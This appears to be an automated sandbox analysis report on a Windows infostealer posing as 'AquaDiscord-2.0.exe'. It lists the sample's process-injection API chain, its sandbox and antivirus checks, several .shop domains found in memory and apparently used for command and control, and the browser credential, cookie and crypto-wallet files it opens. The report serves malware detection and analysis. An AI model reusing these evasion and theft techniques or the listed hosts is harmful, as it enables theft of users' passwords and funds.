                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_00439B30 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,2_2_00439B30
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7332:120:WilError_03
                Source: AquaDiscord-2.0.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: AquaDiscord-2.0.exe, 00000002.00000003.1709060724.00000000053F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: AquaDiscord-2.0.exeReversingLabs: Detection: 31%
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile read: C:\Users\user\Desktop\AquaDiscord-2.0.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\AquaDiscord-2.0.exe "C:\Users\user\Desktop\AquaDiscord-2.0.exe"
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeProcess created: C:\Users\user\Desktop\AquaDiscord-2.0.exe "C:\Users\user\Desktop\AquaDiscord-2.0.exe"
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeProcess created: C:\Users\user\Desktop\AquaDiscord-2.0.exe "C:\Users\user\Desktop\AquaDiscord-2.0.exe"Jump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: AquaDiscord-2.0.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: AquaDiscord-2.0.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: AquaDiscord-2.0.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: AquaDiscord-2.0.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: AquaDiscord-2.0.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 0_2_00AF9D6A push ecx; ret 0_2_00AF9D7D
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_00449A37 push edx; iretd 2_2_00449A39
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_00447BC3 push esp; retf 2_2_00447BD9
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_0043D490 push eax; mov dword ptr [esp], 010E0F0Ch2_2_0043D49F
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_00440630 push eax; mov dword ptr [esp], 6C6F6EA1h2_2_00440632
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_00449701 pushfd ; iretd 2_2_00449702
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_004467BC push 00000051h; ret 2_2_0044686F
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_00AF9D6A push ecx; ret 2_2_00AF9D7D
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeWindow / User API: threadDelayed 6911Jump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exe TID: 7420Thread sleep time: -210000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exe TID: 7528Thread sleep count: 6911 > 30Jump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 0_2_00B0B6A8 FindFirstFileExW,0_2_00B0B6A8
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 0_2_00B0B759 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00B0B759
                Source: AquaDiscord-2.0.exe, 00000002.00000003.1747187894.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1737584566.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.2401970930.0000000002DF7000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000002.2909932609.0000000002DF9000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.2401811541.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1791621621.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000002.2909791855.0000000002DBC000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1692630755.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1737979972.0000000002DED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeAPI call chain: ExitProcess graph end nodegraph_2-31530
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_0043EEC0 LdrInitializeThunk,2_2_0043EEC0
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 0_2_00B01A20 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B01A20
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 0_2_00B2019E mov edi, dword ptr fs:[00000030h]0_2_00B2019E
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 0_2_00AF1BA0 mov edi, dword ptr fs:[00000030h]0_2_00AF1BA0
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_00AF1BA0 mov edi, dword ptr fs:[00000030h]2_2_00AF1BA0
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 0_2_00B06FE0 GetProcessHeap,0_2_00B06FE0
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 0_2_00AF9A27 SetUnhandledExceptionFilter,0_2_00AF9A27
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 0_2_00B01A20 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B01A20
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 0_2_00AF9A33 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00AF9A33
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 0_2_00AF9673 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00AF9673
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_00AF9A27 SetUnhandledExceptionFilter,2_2_00AF9A27
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_00B01A20 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00B01A20
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_00AF9A33 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00AF9A33
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_00AF9673 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00AF9673

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 0_2_00B2019E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_00B2019E
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeMemory written: C:\Users\user\Desktop\AquaDiscord-2.0.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: AquaDiscord-2.0.exe, 00000000.00000002.1671085473.0000000003378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: cloudewahsj.shop
                Source: AquaDiscord-2.0.exe, 00000000.00000002.1671085473.0000000003378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: rabidcowse.shop
                Source: AquaDiscord-2.0.exe, 00000000.00000002.1671085473.0000000003378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: noisycuttej.shop
                Source: AquaDiscord-2.0.exe, 00000000.00000002.1671085473.0000000003378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: tirepublicerj.shop
                Source: AquaDiscord-2.0.exe, 00000000.00000002.1671085473.0000000003378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: framekgirus.shop
                Source: AquaDiscord-2.0.exe, 00000000.00000002.1671085473.0000000003378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: wholersorie.shop
                Source: AquaDiscord-2.0.exe, 00000000.00000002.1671085473.0000000003378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: abruptyopsn.shop
                Source: AquaDiscord-2.0.exe, 00000000.00000002.1671085473.0000000003378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: nearycrepso.shop
                Source: AquaDiscord-2.0.exe, 00000000.00000002.1671085473.0000000003378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: fancywaxxers.shop
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeProcess created: C:\Users\user\Desktop\AquaDiscord-2.0.exe "C:\Users\user\Desktop\AquaDiscord-2.0.exe"Jump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: EnumSystemLocalesW,0_2_00B068BD
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: EnumSystemLocalesW,0_2_00B0B085
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: GetLocaleInfoW,0_2_00B0B0D0
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00B0A9F7
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00B0B177
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: GetLocaleInfoW,0_2_00B0B27D
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: GetLocaleInfoW,0_2_00B063B5
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00B0ACF0
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: EnumSystemLocalesW,0_2_00B0AC48
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: GetLocaleInfoW,0_2_00B0AFB0
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: EnumSystemLocalesW,0_2_00B0AF43
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: EnumSystemLocalesW,2_2_00B068BD
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: EnumSystemLocalesW,2_2_00B0B085
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: GetLocaleInfoW,2_2_00B0B0D0
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,2_2_00B0A9F7
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_00B0B177
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: GetLocaleInfoW,2_2_00B0B27D
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: GetLocaleInfoW,2_2_00B063B5
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,2_2_00B0ACF0
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: EnumSystemLocalesW,2_2_00B0AC48
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: GetLocaleInfoW,2_2_00B0AFB0
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: EnumSystemLocalesW,2_2_00B0AF43
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 0_2_00AFA2F5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00AFA2F5
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: AquaDiscord-2.0.exe, 00000002.00000003.2401811541.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1791621621.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.2402060207.0000000002DF3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: Process Memory Space: AquaDiscord-2.0.exe PID: 7400, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: AquaDiscord-2.0.exe, 00000002.00000003.1747187894.0000000002DED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
                Source: AquaDiscord-2.0.exe, 00000002.00000003.1747187894.0000000002DED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                Source: AquaDiscord-2.0.exe, 00000002.00000003.1747187894.0000000002DED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: AquaDiscord-2.0.exe, 00000002.00000003.1747187894.0000000002DED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "},{"en":"cjelfplplebdjjenllpjcblmjkfcffne","ez":"Jaxx Liberty"},{"en":"fihk8t
                Source: AquaDiscord-2.0.exe, 00000002.00000003.1791724305.0000000002E63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3e
                Source: AquaDiscord-2.0.exe, 00000002.00000003.1747187894.0000000002DED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                Source: AquaDiscord-2.0.exe, 00000002.00000003.1737571288.0000000002E44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: AquaDiscord-2.0.exe, 00000002.00000003.1747187894.0000000002DED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
